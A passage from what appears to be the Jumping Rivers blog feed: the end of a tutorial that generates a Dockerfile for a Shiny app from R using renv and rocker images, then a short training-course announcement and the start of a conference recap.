&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dependencies&lt;/span&gt;(appdir)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(pkgs)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="building-out-the-rest-of-the-dockerfile"&gt;Building out the rest of the Dockerfile&lt;/h2&gt;
&lt;p&gt;To reproduce the application as it works on our system, with a
particular R version and particular package versions, we want
to build a Docker image that has the same version of R and the same packages.
The rocker project provides a collection of Docker images for different
purposes, tagged by R version, which makes this substantially
easier, so it’s really a case of ensuring that we match everything up.&lt;/p&gt;
&lt;p&gt;We can write the line that will give us the rocker/shiny image for our R
version fairly easily&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(from_shiny_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;FROM rocker/shiny:{getRversion()}&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; FROM rocker/shiny:4.2.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and {renv} makes it easy to snapshot the versions of the installed
packages that our project requires.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny_renv.lock&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; project &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; appdir,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lockfile,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; force &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then want to copy this lockfile into the Docker image and use
&lt;code&gt;renv::restore()&lt;/code&gt; to recreate the state of the library.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;copy_renv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {lockfile} renv.lock&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv_install &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;install.packages(\&amp;#39;renv\&amp;#39;)&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv_restore &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;renv::restore()&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we want to include the app in the image, declare the port on
which the application will listen (shiny-server defaults to 3838), and
launch Shiny Server when a container is started from the image. Here
&lt;code&gt;expose&lt;/code&gt; and &lt;code&gt;port&lt;/code&gt; are arguments of the wrapper function defined later.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;copy_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {appdir} /srv/shiny-server/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(expose, glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EXPOSE {port}&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;CMD [&amp;#34;/usr/bin/shiny-server&amp;#34;]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Combining all those steps into a single list and writing to file gives
us a final Dockerfile. We can wrap this in a function to make it nicer
to use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny_write_docker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;, appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;, lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny_renv.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt;, expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, rspm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_env &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ENV RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest\n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from_shiny_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;FROM rocker/shiny:{getRversion()}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; project &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; path,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lockfile,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; force &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dependencies&lt;/span&gt;(appdir)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(pkgs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_renv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {lockfile} renv.lock&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_install &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;install.packages(\&amp;#39;renv\&amp;#39;)&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_restore &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;renv::restore()&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {appdir} /srv/shiny-server/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(expose, glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EXPOSE {port}&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cmd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;CMD [&amp;#34;/usr/bin/shiny-server&amp;#34;]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ret &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;compact&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from_shiny_version,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_env,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_renv,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_install,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_restore,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_app,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expose,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cmd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_lines&lt;/span&gt;(ret, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(path, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Dockerfile&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Taking the Old Faithful example {shiny} app template as our app, in a
directory called &lt;code&gt;app/&lt;/code&gt;, running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shiny_write_docker&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;, appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * Lockfile written to &amp;#39;shiny_renv.lock&amp;#39;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Finding R package dependencies ... Done!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;produces the following Dockerfile&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/shiny:4.2.0&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENV&lt;/span&gt; RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt-get update -qq &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get install -y --no-install-recommends &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; make &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; zlib1g-dev&lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get clean &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; rm -rf /var/lib/apt/lists/*&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; shiny_renv.lock renv.lock&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;install.packages(&amp;#39;renv&amp;#39;)&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;renv::restore()&amp;#34;&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; app /srv/shiny-server/&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;CMD&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;/usr/bin/shiny-server&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="running-the-app"&gt;Running the app&lt;/h2&gt;
&lt;p&gt;From our Dockerfile we can build the image&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker build --tag auto_shiny_docker .
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and run a container using that image, mapping the Shiny Server port to
the same port on localhost.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm --publish 3838:3838 auto_shiny_docker
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we navigate in our browser to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http://localhost:3838
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we should see the running application.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;There’s a nice &lt;a href="https://blog.sellorm.com/2021/04/25/shiny-app-in-docker/" rel="external"&gt;blog
post&lt;/a&gt; by
Mark Sellors, which focuses on a particular app, whereas the above
is the general case. Definitely worth a look.&lt;/li&gt;
&lt;li&gt;Our amazing &lt;a href="https://www.jumpingrivers.com/training/course/r-docker-introduction-deployment/" rel="external"&gt;Docker
courses&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-auto-docker/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training course update - Autumn 2022</title><link>https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/</link><pubDate>Tue, 18 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers we like to keep our courses up to date so we can bring you training on the latest tools and technologies. To this end, we have recently added two new courses to our listing!&lt;/p&gt;
&lt;h3 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then this course is for you. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;h3 id="shiny-for--python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/shiny-for-python/" rel="external"&gt;Shiny for Python&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have Python and data science skills? Discover how easy it can be with Shiny for Python to develop an application for exploring data without relying on web development or external BI tools.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-course-update-autumn-2022/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2022)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights/</link><pubDate>Thu, 13 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last week, we were very excited to host our first Shiny in Production conference! Attendees gathered in The Catalyst in Newcastle for two days of workshops and talks focusing on all things related to Shiny, building dashboards, and cool things you can do in R.&lt;/p&gt;
&lt;p&gt;On day one, we ran three workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
